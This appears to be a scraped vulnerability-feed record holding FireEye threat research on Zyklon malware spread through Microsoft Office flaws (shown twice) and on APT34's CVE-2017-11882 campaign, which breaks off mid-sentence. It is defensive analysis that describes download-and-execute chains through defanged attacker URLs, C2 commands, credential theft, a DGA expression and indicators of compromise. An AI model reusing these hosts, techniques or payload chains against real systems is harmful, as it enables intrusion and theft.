Browser\n * SRWare Iron Browser\n * Comodo Dragon Browser\n\n##### FTP Password Recovery\n\nZyklon currently supports FTP password recovery from the following FTP applications:\n\n * FileZilla\n * SmartFTP\n * FlashFXP\n * FTPCommander\n * Dreamweaver\n * WS_FTP\n\n##### Gaming Software Key Recovery\n\nZyklon can recover PC Gaming software keys from the following games:\n\n * Battlefield\n * Call of Duty\n * FIFA\n * NFS\n * Age of Empires\n * Quake\n * The Sims\n * Half-Life\n * IGI\n * Star Wars\n\n##### Email Password Recovery\n\nZyklon may also collect email passwords from following applications:\n\n * Microsoft Outlook Express\n * Microsoft Outlook 2002/XP/2003/2007/2010/2013\n * Mozilla Thunderbird\n * Windows Live Mail 2012\n * IncrediMail, Foxmail v6.x - v7.x\n * Windows Live Messenger\n * MSN Messenger\n * Google Talk\n * GMail Notifier\n * PaltalkScene IM\n * Pidgin (Formerly Gaim) Messenger\n * Miranda Messenger\n * Windows Credential Manager\n\n##### License Key Recovery\n\nThe malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.\n\n##### Socks5 Proxy\n\nZyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.\n\n##### Hijack Clipboard Bitcoin Address\n\nZyklon has the ability to hijack the clipboard, and replaces the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server.\n\n#### Zyklon Pricing\n\nResearchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:\n\n * Normal build: $75 (USD)\n * Tor-enabled build: $125 (USD)\n * Rebuild/Updates: $15 (USD)\n * Payment Method: Bitcoin (BTC)\n\n#### Conclusion\n\nThreat actors incorporating recently discovered vulnerabilities in popular software \u2013 Microsoft Office, in this case \u2013 only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.\n\nAt this time of writing, FireEye [Multi Vector Execution (MVX) engine](<https://www.fireeye.com/>) is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.\n\nDetection Name\n\n| \n\nProduct\n\n| \n\nAction \n \n---|---|--- \n \nPOWERSHELL DOWNLOADER D (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS EQNEDT USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nTOR (TUNNELER)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS SVCHOST.EXE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nMalware.Binary.rtf\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nMalware.Binary\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE_2017_8759\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE201711882_1\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nTable 2: Current detection capabilities by FireEye products\n\n#### Indicators of Compromise\n\nThe contained analysis is based on the representative sample lures shown in Table 3.\n\nMD5\n\n| \n\nName \n \n---|--- \n \n76011037410d031aa41e5d381909f9ce\n\n| \n\naccounts.doc \n \n4bae7fb819761a7ac8326baf8d8eb6ab\n\n| \n\nCourrier.doc \n \neb5fa454ab42c8aec443ba8b8c97339b\n\n| \n\ndoc.doc \n \n886a4da306e019aa0ad3a03524b02a1c\n\n| \n\nPause.ps1 \n \n04077ecbdc412d6d87fc21e4b3a4d088\n\n| \n\nwords.exe \n \nTable 3: Sample Zyklon lures\n\n##### Network Indicators\n\n * 154.16.93.182\n * 85.214.136.179\n * 178.254.21.218\n * 159.203.42.107\n * 217.12.223.216\n * 138.201.143.186\n * 216.244.85.211\n * 51.15.78.0\n * 213.251.226.175\n * 93.95.100.202\n * warnono.punkdns.top\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-01-17T17:00:00", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in\nRecent Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "modified": "2018-01-17T17:00:00", "id": "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "href": "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:21", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.\n\nZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.\n\n#### Infection Vector\n\nWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).\n\nThe following industries have been the primary targets in this campaign:\n\n * Telecommunications\n * Insurance\n * Financial Services\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig1.png) \nFigure 1: Sample lure documents\n\n#### Attack Flow\n\n 1. Spam email arrives in the victim\u2019s mailbox as a ZIP attachment, which contains a malicious DOC file.\n 2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.\n 3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.\n\nA visual representation of the attack flow and execution chain can be seen in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig2.png) \nFigure 2: Zyklon attack flow\n\n#### Infection Techniques\n\n##### CVE-2017-8759\n\nThis vulnerability was [discovered by FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017, and it is a vulnerability we have observed being exploited in the wild.\n\nThe DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Figure3.png) \nFigure 3: Embedded URL in OLE object\n\n##### CVE-2017-11882\n\nSimilarly, we have also observed actors leveraging another recently [discovered](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Figure4.png) \nFigure 4: Embedded URL in OLE object\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig5.png) \nFigure 5: HTTP GET request to download the next level payload\n\nThe downloaded file, _doc.doc,_ is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary _Pause.ps1_.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig6.png) \nFigure 6: PowerShell command to download the Pause.ps1 payload\n\n##### Dynamic Data Exchange (DDE)\n\nDynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (_Pause.ps1) _is downloaded.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig7.png) \nFigure 7: DDE technique used to download the Pause.ps1 payload\n\nOne of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).\n\nFigure 8 shows the network communication of the _Pause.ps1_ download.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig8.png) \nFigure 8: Network communication to download the Pause.ps1 payload\n\n#### Zyklon Delivery\n\nIn all these techniques, the same domain is used to download the next level payload (_Pause.ps1_), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).\n\nThe _Pause.ps1_ script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig9.png) \nFigure 9: Base64 decoded Pause.ps1\n\nThe injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig10.png) \nFigure 10: Network traffic to download final payload (words.exe)\n\nOnce executed, the file performs the following activities:\n\n 1. Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).\n 2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.\n 3. The unpacked code is Zyklon.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig11.png) \nFigure 11: XML configuration file to schedule the task\n\nThe Zyklon malware first retrieves the external IP address of the infected machine using the following:\n\n * api.ipify[.]org\n * ip.anysrc[.]net\n * myexternalip[.]com\n * whatsmyip[.]com\n\nThe Zyklon executable contains another encrypted file in its .Net resource section named _tor_. This file is decrypted and injected into an instance of _InstallUtiil.exe_, and functions as a Tor anonymizer.\n\n#### Command & Control Communication\n\nThe C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig12.png) \nFigure 12: Zyklon public RSA key\n\nAfter the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.\n\nCommand\n\n| \n\nAction \n \n---|--- \n \nsign\n\n| \n\nRequests system information \n \nsettings\n\n| \n\nRequests settings from C2 server \n \nlogs\n\n| \n\nUploads harvested passwords \n \nwallet\n\n| \n\nUploads harvested cryptocurrency wallet data \n \nproxy\n\n| \n\nIndicates SOCKS proxy port opened \n \nminer\n\n| \n\nCryptocurrency miner commands \n \nerror\n\n| \n\nReports errors to C2 server \n \nddos\n\n| \n\nDDoS attack commands \n \nTable 1: Zyklon accepted commands\n\nThe following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig13.png) \nFigure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig14.png) \nFigure 14: Zyklon issuing \u201csign\u201d command and subsequent server response\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig15.png) \nFigure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response\n\n#### Plugin Manager\n\nZyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:\n\n * /plugin/index.php?plugin=<_Plugin_Name_>\n\nThe following plugins are found in the memory of the Zyklon malware:\n\n * /plugin/index.php?plugin=cuda\n * /plugin/index.php?plugin=minerd\n * /plugin/index.php?plugin=sgminer\n * /plugin/index.php?plugin=socks\n * /plugin/index.php?plugin=tor\n * /plugin/index.php?plugin=games\n * /plugin/index.php?plugin=software\n * /plugin/index.php?plugin=ftp\n * /plugin/index.php?plugin=email\n * /plugin/index.php?plugin=browser\n\nThe downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe.\n\n#### Additional Features\n\nThe Zyklon malware offers the following additional capabilities (via plugins):\n\n##### Browser Password Recovery\n\nZyklon HTTP can recover passwords from popular web browsers, including:\n\n * Google Chrome\n * Mozilla Firefox\n * Internet Explorer\n * Opera Browser\n * Chrome Canary/SXS\n * CoolNovo Browser\n * Apple Safari\n * Flock Browser\n * SeaMonkey Browser\n * SRWare Iron Browser\n * Comodo Dragon Browser\n\n##### FTP Password Recovery\n\nZyklon currently supports FTP password recovery from the following FTP applications:\n\n * FileZilla\n * SmartFTP\n * FlashFXP\n * FTPCommander\n * Dreamweaver\n * WS_FTP\n\n##### Gaming Software Key Recovery\n\nZyklon can recover PC Gaming software keys from the following games:\n\n * Battlefield\n * Call of Duty\n * FIFA\n * NFS\n * Age of Empires\n * Quake\n * The Sims\n * Half-Life\n * IGI\n * Star Wars\n\n##### Email Password Recovery\n\nZyklon may also collect email passwords from following applications:\n\n * Microsoft Outlook Express\n * Microsoft Outlook 2002/XP/2003/2007/2010/2013\n * Mozilla Thunderbird\n * Windows Live Mail 2012\n * IncrediMail, Foxmail v6.x - v7.x\n * Windows Live Messenger\n * MSN Messenger\n * Google Talk\n * GMail Notifier\n * PaltalkScene IM\n * Pidgin (Formerly Gaim) Messenger\n * Miranda Messenger\n * Windows Credential Manager\n\n##### License Key Recovery\n\nThe malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.\n\n##### Socks5 Proxy\n\nZyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.\n\n##### Hijack Clipboard Bitcoin Address\n\nZyklon has the ability to hijack the clipboard, and replaces the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server.\n\n#### Zyklon Pricing\n\nResearchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:\n\n * Normal build: $75 (USD)\n * Tor-enabled build: $125 (USD)\n * Rebuild/Updates: $15 (USD)\n * Payment Method: Bitcoin (BTC)\n\n#### Conclusion\n\nThreat actors incorporating recently discovered vulnerabilities in popular software \u2013 Microsoft Office, in this case \u2013 only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.\n\nAt this time of writing, FireEye [Multi Vector Execution (MVX) engine](<https://www.fireeye.com/>) is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.\n\nDetection Name\n\n| \n\nProduct\n\n| \n\nAction \n \n---|---|--- \n \nPOWERSHELL DOWNLOADER D (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS EQNEDT USAGE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nTOR (TUNNELER)\n\n| \n\nHX\n\n| \n\nDetect \n \nSUSPICIOUS SVCHOST.EXE (METHODOLOGY)\n\n| \n\nHX\n\n| \n\nDetect \n \nMalware.Binary.rtf\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nMalware.Binary\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE_2017_8759\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nFE_Exploit_RTF_CVE201711882_1\n\n| \n\nEX/ETP/NX\n\n| \n\nBlock \n \nTable 2: Current detection capabilities by FireEye products\n\n#### Indicators of Compromise\n\nThe contained analysis is based on the representative sample lures shown in Table 3.\n\nMD5\n\n| \n\nName \n \n---|--- \n \n76011037410d031aa41e5d381909f9ce\n\n| \n\naccounts.doc \n \n4bae7fb819761a7ac8326baf8d8eb6ab\n\n| \n\nCourrier.doc \n \neb5fa454ab42c8aec443ba8b8c97339b\n\n| \n\ndoc.doc \n \n886a4da306e019aa0ad3a03524b02a1c\n\n| \n\nPause.ps1 \n \n04077ecbdc412d6d87fc21e4b3a4d088\n\n| \n\nwords.exe \n \nTable 3: Sample Zyklon lures\n\n##### Network Indicators\n\n * 154.16.93.182\n * 85.214.136.179\n * 178.254.21.218\n * 159.203.42.107\n * 217.12.223.216\n * 138.201.143.186\n * 216.244.85.211\n * 51.15.78.0\n * 213.251.226.175\n * 93.95.100.202\n * warnono.punkdns.top\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-01-17T12:00:00", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "modified": "2018-01-17T12:00:00", "id": "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "href": "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:23", "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the \u201cWinExec\u201d function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the \u201cWinExec\u201d function.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig1.png) \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of current logged on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig2.png) \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig3.png) \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig4.png) \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig5.png) \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.\n\nCommand\n\n| \n\nDescription\n\n| \n\nAction \n \n---|---|--- \n \n0\n\n| \n\nServer response string contains batch commands\n\n| \n\nExecute batch commands and send results back to server \n \n1\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and upload (PUT) the file to server \n \n2\n\n| \n\nServer response string is a file path\n\n| \n\nCheck for file path and download (GET) the file \n \nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig6.png) \nFigure 6: Powershell Screenshot Functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig7.png) \nFigure 7: Breakdown of subdomain created by BONDUPDATER\n\n 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. Initially set to 000, then incremented by 3 after every DNS request\n 4. First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig8.png) \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig9.png) \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig10.png) \nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/apt34-middle-east/Fig11.png) \nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8)** **that exploited CVE-2017-0199. This file issued a GET request to download a malicious file 